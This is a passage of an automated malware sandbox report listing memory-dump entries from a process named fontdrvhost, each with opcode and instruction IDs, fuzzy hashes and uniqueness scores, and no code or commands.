                                                                    • Instruction Fuzzy Hash: C5110431B445078FE724AF98E4652E673E0FB95399F50463BD51DC3680DB39A9608B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10dd1ce8918a3f37fb78112b6543f426ab5550d5a0bdbd81397bf1dd2116f2d1
                                                                    • Instruction ID: e1da9b8990a38c478af22c6a86abb3ae21895a636cd0ad9bb29bb144709bff74
                                                                    • Opcode Fuzzy Hash: 10dd1ce8918a3f37fb78112b6543f426ab5550d5a0bdbd81397bf1dd2116f2d1
                                                                    • Instruction Fuzzy Hash: 2E110431B046078FE724AF58D4212E673A4FB95355F10473BE50DC36C0EB39AA508B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95b739312845735a88a828101c4d7c431de191a5487b0fb5ba0d19f701a27811
                                                                    • Instruction ID: fcebd36a4d76209902747413e94c68212d929b1936369e53e8d9cca0b5c97e56
                                                                    • Opcode Fuzzy Hash: 95b739312845735a88a828101c4d7c431de191a5487b0fb5ba0d19f701a27811
                                                                    • Instruction Fuzzy Hash: EF11E131B0540A8FE724EF9CE4252F57390FBA5319F11063AD509C72E0CB39A950C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecab01fb381493a2ccbe7887ecc040611a6541fdc55b3dc26c3fab18b262a69f
                                                                    • Instruction ID: 36c2b3f7640e2d02b79c9988abee71c0ace4c5bb6f0ccf331ae8353f42aee682
                                                                    • Opcode Fuzzy Hash: ecab01fb381493a2ccbe7887ecc040611a6541fdc55b3dc26c3fab18b262a69f
                                                                    • Instruction Fuzzy Hash: 11118334E2891EDFDBA8EB98D4A09ADB7B1FF58340F500679E00EE3295DB3468419B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85ba806d8b0e693e43dcadcbed138610b0bffb359638b809900407908f3fbd5a
                                                                    • Instruction ID: c0610fb9783c225f0c4ac2b2b4cc1e612228af5539e85e91fdbd397a23783ac4
                                                                    • Opcode Fuzzy Hash: 85ba806d8b0e693e43dcadcbed138610b0bffb359638b809900407908f3fbd5a
                                                                    • Instruction Fuzzy Hash: 2C017C7190E3C99FDB539FB489606D83FB0BF13250F4A01EBE494CB0A3DA695A19C752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction ID: 002a6d5caa19f80ed696eb127083028ddd1de0a55e32ea118b9ab8281a2f6bdd
                                                                    • Opcode Fuzzy Hash: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction Fuzzy Hash: C801C030D0834D8FEB94DF95C8585FD7BB1EF16300F14426EC465972A6EA74A906CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d67b2f1eeaf81dbd705663f8a2f0bdbe20858f4ddb986e08e0dd165ffe405ef0
                                                                    • Instruction ID: 132545edcfb1f624dae64cc1adf4ecb00b876bdbf0256ac2c133c5303a9aa4a0
                                                                    • Opcode Fuzzy Hash: d67b2f1eeaf81dbd705663f8a2f0bdbe20858f4ddb986e08e0dd165ffe405ef0
                                                                    • Instruction Fuzzy Hash: FBF0A43194F2CA9FD712DBB488224E93FA0BF03208B0901F6D055CB0E2D63D5606C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18c755660ea09ef0892844bb1c6037b26f14b3ee581cd8b78485d905c358487
                                                                    • Instruction ID: 5829b0c6f13e69b3d28cc00d5e299941299675fab4b0d66583e8884a12340a85
                                                                    • Opcode Fuzzy Hash: b18c755660ea09ef0892844bb1c6037b26f14b3ee581cd8b78485d905c358487
                                                                    • Instruction Fuzzy Hash: 1F017274909A1D8FDFA8DF58D8A4BA8B7B1FB68300F1041AED44EE3250CB715A85CF04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7292212fd550abeec741d867532985dd15d728077d31692773424573d65185e1
                                                                    • Instruction ID: 41d02f3500dea65440f92f4aa81da53152d88d65afd72887c114ef33f7b9d644
                                                                    • Opcode Fuzzy Hash: 7292212fd550abeec741d867532985dd15d728077d31692773424573d65185e1
                                                                    • Instruction Fuzzy Hash: 4001FB70A0980DCFDF98DB88D4A1AACB7B1FF98305F110169D50EE32A0CA34AD02CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin